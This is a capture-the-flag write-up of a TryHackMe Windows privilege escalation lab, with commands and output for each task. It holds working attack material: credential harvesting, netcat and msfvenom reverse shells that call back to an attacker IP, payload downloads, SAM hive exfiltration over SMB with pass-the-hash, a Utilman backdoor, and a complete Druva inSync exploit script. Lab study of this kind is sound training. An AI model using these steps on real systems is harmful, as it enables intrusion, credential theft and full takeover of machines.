Post Compromise - 03 Windows Privilege Escalation | TryHackMe
Task 2 Windows Privilege Escalation
The weaknesses could be abused to privilege escalation:
- Misconfigurations on Windows services or scheduled tasks
- Excessive privileges assigned to our account
- Vulnerable software
- Missing Windows security patches
Question: Users that can change system configurations are part of which group?
Answer: Administrators
Question: The SYSTEM account has more privileges than the Administrator user (aye/nay)
Answer: aye
Task 3 Harvesting Passwords from Usual Spots
Question: A password for the julia.jones
user has been left on the Powershell history. What is the password?
Answer: ZuperCkretPa5z
C:\Users\thm-unpriv>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ls
whoami
whoami /priv
whoami /group
whoami /groups
cmdkey /?
cmdkey /add:thmdc.local /user:julia.jones /pass:ZuperCkretPa5z
cmdkey /list
cmdkey /delete:thmdc.local
cmdkey /list
runas /?
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cd c:\
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Question: A web server is running on the remote host. Find any interesting password on web.config
files associated with IIS. What is the password of the db_admin
user?
Answer: 098n0x35skjD3
C:\Users\thm-unpriv>type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
<add connectionStringName="LocalSqlServer" maxEventDetailsLength="1073741823" buffer="false" bufferMode="Notification" name="SqlWebEventProvider" type="System.Web.Management.SqlWebEventProvider,System.Web,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a" />
<add connectionStringName="LocalSqlServer" name="AspNetSqlPersonalizationProvider" type="System.Web.UI.WebControls.WebParts.SqlPersonalizationProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<connectionStrings>
<add connectionString="Server=thm-db.local;Database=thm-sekure;User ID=db_admin;Password=098n0x35skjD3" name="THM-DB" />
</connectionStrings>
Question: There is a saved password on your Windows credentials. Using cmdkey
and runas
, spawn a shell for mike.katz
and retrieve the flag
from his desktop.
Answer: THM{WHAT_IS_MY_PASSWORD}
C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv
C:\Users\thm-unpriv>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WPRIVESC1\mike.katz
Type: Domain Password
User: WPRIVESC1\mike.katz
C:\Users\thm-unpriv>runas /savecred /user:mike.katz cmd.exe
Attempting to start cmd.exe as user "WPRIVESC1\mike.katz" ...
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
wprivesc1\mike.katz
C:\Windows\system32>dir C:\Users\mike.katz\Desktop
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\mike.katz\Desktop
05/04/2022 05:17 AM <DIR> .
05/04/2022 05:17 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/04/2022 05:17 AM 24 flag.txt
3 File(s) 1,105 bytes
2 Dir(s) 14,820,655,104 bytes free
C:\Windows\system32>type C:\Users\mike.katz\Desktop\flag.txt
THM{WHAT_IS_MY_PASSWORD}
Question: Retrieve the saved password stored in the saved PuTTY
session under your profile. What is the password for the thom.smith
user?
Answer: CoolPass2021
C:\Users\thm-unpriv>reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\My%20ssh%20server
ProxyExcludeList REG_SZ
ProxyDNS REG_DWORD 0x1
ProxyLocalhost REG_DWORD 0x0
ProxyMethod REG_DWORD 0x0
ProxyHost REG_SZ proxy
ProxyPort REG_DWORD 0x50
ProxyUsername REG_SZ thom.smith
ProxyPassword REG_SZ CoolPass2021
ProxyTelnetCommand REG_SZ connect %host %port\n
ProxyLogToTerm REG_DWORD 0x1
End of search: 10 match(es) found.
Task 4 Other Quick Wins
Question: What is the taskusr1 flag?
Answer: THM{TASK_COMPLETED}
First of all, check scheduled tasks with the schtask command:
C:\Users\thm-unpriv>whoami
wprivesc1\thm-unpriv
C:\Users\thm-unpriv>schtasks | findstr "vuln"
vulntask N/A Ready
C:\Users\thm-unpriv> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: WPRIVESC1
TaskName: \vulntask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 9/20/2023 4:50:15 PM
Last Result: 0
Author: WPRIVESC1\Administrator
Task To Run: C:\tasks\schtask.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: taskusr1
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
C:\Users\thm-unpriv>echo c:\tools\nc64.exe -e cmd.exe 10.11.52.229 4444 > C:\tasks\schtask.bat
The "Task to Run" parameter is C:\tasks\schtask.bat
, we could modify the .bat
file and insert any payload to spawn a reverse shell, here I've used C:\tools\nc64.exe
.
Then start a listener on the attacker machine:
nc -lvnp 4444
Start the task manually:
C:\Users\thm-unpriv>schtasks /run /tn vulntask
SUCCESS: Attempted to run the scheduled task "vulntask".
Receive the reverse shell with taskusr1
privileges as expected:
❯ ncat -lvnp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.201.216:49789.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\taskusr1
C:\Windows\system32>dir C:\Users\taskusr1\Desktop\
dir C:\Users\taskusr1\Desktop\
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\taskusr1\Desktop
05/03/2022 01:00 PM <DIR> .
05/03/2022 01:00 PM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/03/2022 01:00 PM 19 flag.txt
3 File(s) 1,100 bytes
2 Dir(s) 15,015,317,504 bytes free
C:\Windows\system32>type C:\Users\taskusr1\Desktop\flag.txt
type C:\Users\taskusr1\Desktop\flag.txt
THM{TASK_COMPLETED}
Task 5 Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Question: Get the flag on svcusr1's desktop.
Check the service properties and permissions:
C:\Users\thm-unpriv>sc qc windowsscheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler Service
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr1
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
The service installed by the vulnerable software runs as svcusr1
and the executable associated with the service is in C:\Progra~2\System~1\WService.exe
. Also, the Everyone group has modify permissions (M) on the service's executable.
This means I could simply overwrite it with any payload of my preference, and the service will execute it with the privileges of the configured user account(svcusr1
).
Generate an exe-service payload using msfvenom and serve it through a python webserver:
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.52.229 LPORT=22002 -f exe-service -o rev-svc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe-service file: 48640 bytes
Saved as: rev-svc.exe
❯ python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
Then just pull the payload through PowerShell, and replace the service executable with it:
PS C:\Users\thm-unpriv> wget http://10.11.52.229/rev-svc.exe -O rev-svc.exe
PS C:\Users\thm-unpriv>move C:\PROGRA~2\SYSTEM~1\WService.exe C:\PROGRA~2\SYSTEM~1\WService.exe.bak
1 file(s) moved.
PS C:\Users\thm-unpriv>move rev-svc.exe C:\PROGRA~2\SYSTEM~1\WService.exe
1 file(s) moved.
Grant full permissions to the Everyone group:
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WPRIVESC1\thm-unpriv:(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe /grant Everyone:F
processed file: C:\PROGRA~2\SYSTEM~1\WService.exe
Successfully processed 1 files; Failed processing 0 files
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WPRIVESC1\thm-unpriv:(F)
Everyone:(I)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
WPRIVESC1\thm-unpriv:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
Start nc on attack machine and restart the service on the target:
C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler
❯ ncat -lvnp 22002
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22002
Ncat: Listening on 0.0.0.0:22002
Ncat: Connection from 10.10.2.92:49853.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\svcusr1
C:\Windows\system32>type C:\Users\svcusr1\Desktop\flag.txt
type C:\Users\svcusr1\Desktop\flag.txt
THM{AT_YOUR_SERVICE}
Answer: THM{AT_YOUR_SERVICE}
Unquoted Service Paths
Question: Get the flag on svcusr2's desktop.
Regenerate an exe-service payload, upload it again and start a listener on attack machine.
Find a service without proper quotation:
PS C:\Users\thm-unpriv\Desktop> sc.exe qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: disk sorter enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Sorter Enterprise
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr2
Move the payload to C:\MyPrograms\Disk.exe
and grant it with Everyone full permissions. Then just restart the service so I could recive the reverse shell.
PS C:\Users\thm-unpriv\Desktop> move .\svc2.exe C:\MyPrograms\Disk.exe
PS C:\Users\thm-unpriv\Desktop> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
processed file: C:\MyPrograms\Disk.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\thm-unpriv\Desktop> sc.exe stop "disk sorter enterprise"
[SC] ControlService FAILED 1062:
The service has not been started.
PS C:\Users\thm-unpriv\Desktop> sc.exe start "disk sorter enterprise"
SERVICE_NAME: disk sorter enterprise
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 4932
FLAGS :
❯ ncat -lvnp 22003
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22003
Ncat: Listening on 0.0.0.0:22003
Ncat: Connection from 10.10.2.92:49900.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
wprivesc1\svcusr2
C:\Windows\system32>type C:\Users\svcusr2\Desktop\flag.txt
type C:\Users\svcusr2\Desktop\flag.txt
THM{QUOTES_EVERYWHERE}
C:\Windows\system32>
Answer: THM{QUOTES_EVERYWHERE}
Insecure Service Permissions
Question: Get the flag on the Administrator's desktop.
Use Accesschk64.exe
from the sysinternals suite to view the DACL (Discretionary Access Control Lists) on the thmservice:
PS C:\Users\thm-unpriv\Desktop> cd C:\tools\AccessChk\
PS C:\tools\AccessChk> .\accesschk64.exe -qlc thmservice
Accesschk v6.14 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
thmservice
DESCRIPTOR FLAGS:
[SE_DACL_PRESENT]
[SE_SACL_PRESENT]
[SE_SELF_RELATIVE]
OWNER: NT AUTHORITY\SYSTEM
[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_PAUSE_CONTINUE
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
SERVICE_ALL_ACCESS
[2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
SERVICE_ALL_ACCESS
Here we can see that the BUILTIN\\Users
group has the SERVICE_ALL_ACCESS
permission, which means any user can reconfigure the service.
Regenerate an exe-service payload, upload it again and start a listener on attack machine. Also, grant the payload with Everyone full permissions.
PS C:\tools\AccessChk> cd C:\Users\thm-unpriv\Desktop
PS C:\Users\thm-unpriv\Desktop> wget http://10.11.52.229/svc3.exe -O svc3.exe
PS C:\Users\thm-unpriv\Desktop> ls
Directory: C:\Users\thm-unpriv\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2022 8:15 AM 1387 ProcessHacker.lnk
-a---- 9/23/2023 7:19 AM 48640 svc3.exe
PS C:\Users\thm-unpriv\Desktop> icacls .\svc3.exe /grant Everyone:F
processed file: .\svc3.exe
Successfully processed 1 files; Failed processing 0 files
Reconfigure the vulnerable "thmservice" and restart it:
PS C:\Users\thm-unpriv\Desktop> sc.exe config THMService binPath= "C:\Users\thm-unpriv\Desktop\svc3.exe" obj= LocalSystem
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\thm-unpriv\Desktop> sc.exe start THMService
SERVICE_NAME: THMService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 756
FLAGS :
❯ ncat -lvnp 22004
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:22004
Ncat: Listening on 0.0.0.0:22004
Ncat: Connection from 10.10.2.92:49908.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt
type C:\Users\Administrator\Desktop\flag.txt
THM{INSECURE_SVC_CONFIG}
C:\Windows\system32>
Answer: THM{INSECURE_SVC_CONFIG}
Task 6 Abusing dangerous privileges
Question: Get the flag on the Administrator's desktop.
SeBackup / SeRestore
Check the privileges one the target(open a command prompt with the "Open as administrator" option):
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
In order to be able to copy files from the target machine to the attack machine, I'd like to use impacket's smbserver.py
(could be installed with pip install impacket
) to start a simple SMB server with a network share:
❯ mkdir share
❯ smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B32****EE188 V:3.0
[*] Callback added for UUID 6BFF****E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then backup the SAM and SYSTEM hashes on the target machine, and copy these files to the attack machine.
PS C:\Windows\system32> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
PS C:\Windows\system32> copy C:\Users\THMBackup\sam.hive \\10.11.52.229\public\
PS C:\Windows\system32> copy C:\Users\THMBackup\system.hive \\10.11.52.229\public\
We can now use impacket to get administrator's hash:
❯ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
THMBackup:1008:aad3b435b51404eeaad3b435b51404ee:6c252027fb2022f5051e854e08023537:::
THMTakeOwnership:1009:aad3b435b51404eeaad3b435b51404ee:0af9b65477395b680b822e0b2c45b93b:::
[*] Cleaning up...
Finally, we can use the impacket with the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges:
❯ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 [email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.47.4.....
[*] Found writable share ADMIN$
[*] Uploading file NvvXZONf.exe
[*] Opening SVCManager on 10.10.47.4.....
[*] Creating service uteZ on 10.10.47.4.....
[*] Starting service uteZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\flag.txt
THM{SEFLAGPRIVILEGE}
C:\Windows\system32>
Answer: THM{SEFLAGPRIVILEGE}
SeTakeOwnership
Check the privileges one the target(open a command prompt with the "Open as administrator" option):
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We can also abuse utilman.exe
to escalate privileges in this case.
First let's take ownership on utilman.exe
and grant us full permission:
PS C:\Windows\system32> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WPRIVESC2\THMTakeOwnership".
PS C:\Windows\system32> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: C:\Windows\System32\Utilman.exe
Successfully processed 1 files; Failed processing 0 files
PS C:\Windows\system32>
Then just replace utilman.exe
with a copy of cmd.exe
:
PS C:\Windows\system32> copy cmd.exe Utilman.exe
Wew can now trigger utilman.exe
from locking the session and clicking the ease of access
button to get the system shell :
Task 7 Abusing vulnerable software
Question: Get the flag on the Administrator's desktop.
Druva inSync 6.6.3 exploit code exp.ps1
:
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
This exp will create user pwnd
with a password of SimplePass123
and add it to the administrators' group.
After executing this in powershell, we could check the membership of our new added user:
PS C:\tools> .\Druva_inSync_exploit.ps1
22
4
4
280
PS C:\tools> net user pwnd
User name pwnd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/23/2023 8:44:56 AM
Password expires 11/4/2023 8:44:56 AM
Password changeable 9/23/2023 8:44:56 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
Use the following commands to change the user:
PS C:\tools> Start-Process powershell -Verb runAs
PS C:\Windows\system32> whoami
wprivesc3\pwnd
PS C:\Windows\system32> type c:\users\administrator\desktop\flag.txt
THM{EZ_DLL_PROXY_4ME}
PS C:\Windows\system32>
Answer: THM{EZ_DLL_PROXY_4ME}
Task 8 Tools of the Trade
WinPEAS
project link:
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
C:\tools> winpeas.exe > outputfile.txt
PrivescCheck
project link:
https://github.com/itm4n/PrivescCheck
cmd:
C:\tools> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
powershell:
PS C:\tools> Set-ExecutionPolicy Bypass -Scope process -Force
PS C:\tools> . .\PrivescCheck.ps1
PS C:\tools> Invoke-PrivescCheck -Extended -Report "PrivescCheck_$($env:COMPUTERNAME)"
Metasploit
If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester
module to list vulnerabilities that may affect the target system and allow you to elevate your privileges on the target system.